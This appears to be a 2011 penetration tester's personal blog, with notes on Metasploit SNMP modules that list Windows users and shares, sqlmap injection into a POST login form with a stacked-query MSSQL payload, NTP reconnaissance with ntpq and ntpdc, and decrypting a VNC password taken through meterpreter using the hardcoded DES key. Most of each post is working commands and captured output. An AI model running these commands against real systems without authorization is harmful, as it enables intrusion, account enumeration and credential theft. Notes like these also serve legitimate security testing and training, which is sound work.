Wednesday, March 23, 2011

New SNMP Metasploit Modules

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers

use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS

msf auxiliary(snmp_login) > run

[+] SNMP: community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...

[*] Host provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info



This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS
msf auxiliary(snmp_enumusers) > run

[+] Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info

This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS
msf auxiliary(snmp_enumshares) > run

backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)

MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)

NewBackup2 - (J:\NewBackup2)

SharepointBackup - (K:\SharepointBackup)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Monday, March 21, 2011

sqlmap with POST requests

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string

--postfix=POSTFIX <-- Injection payload postfix string

--dbms=DBMS <--Force back-end DBMS to this value

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request

user@ubuntu:~/pentest/sqlmap-dev$ python -u "" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On

Friday, March 18, 2011

I forgot my NTP stuff, so here's more notes on it

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:
ntpdc -c sysinfo
ntpdc -c monolist

ntpdc -c listpeers

ntpdc -c peers

ntpdc -c reslist
-> version

-> host

-> readlist

-> lpeers

-> hostnames

-> keytype

-> ntpversion

-> associations
-> pstatus [#]

ntpq> help
ntpq commands:

addvars debug lopeers passociations rl

associations delay lpassociations passwd rmvars

authenticate exit lpeers peers rv

cl help mreadlist poll showvars

clearvars host mreadvar pstatus timeout

clocklist hostnames mrl quit version

clockvar keyid mrv raw writelist

cooked keytype ntpversion readlist writevar

cv lassociations opeers readvar


chris@notbt:/pentest$ ntpq
ntpq> lpeers

remote refid st t when poll reach delay offset jitter


*computerville.wxy.suk 2 u 338 1024 377 35.327 -0.702 1.030

ntpq> version

ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host

current host is

ntpq> readlist

assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,

version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)",
processor="x86_64", system="Linux/", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,

clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,

tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames

hostnames being shown

ntpq> keytype

keytype is MD5

ntpq> ntpversion

NTP version being claimed is 2

ntpq> associations

ind assID status conf reach auth condition last_event cnt


1 18290 964a yes yes none sys.peer 4

ntpq> pstatus 18290

assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,, srcport=123, dstadr=,

dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,

rootdisp=33.768, refid=,
reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,

unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,

keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,
xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,

filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96

chris@notbt:/pentest$ ntpdc -c monlist

remote address port local address count m ver code avgint lstint
=============================================================================== 123 6832 4 4
90 1044 476

chris@notbt:/pentest$ ntpdc -c sysinfo

system peer:
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: []
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers


chris@notbt:/pentest$ ntpdc -c peers

remote local st poll reach delay offset disp
*computerville.wxy.suk 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist

address mask count flags

===================================================================== 6846 nomodify, nopeer

some-domain 0 none

some-domain 0 ignore 0 ignore

:: :: 0 nomodify, nopeer

ip6-localhost ffff:ffff:ffff: 0 ignore

fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore

Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec

or use this one

where you can just put your hash on the command line and don't have to recompile every time.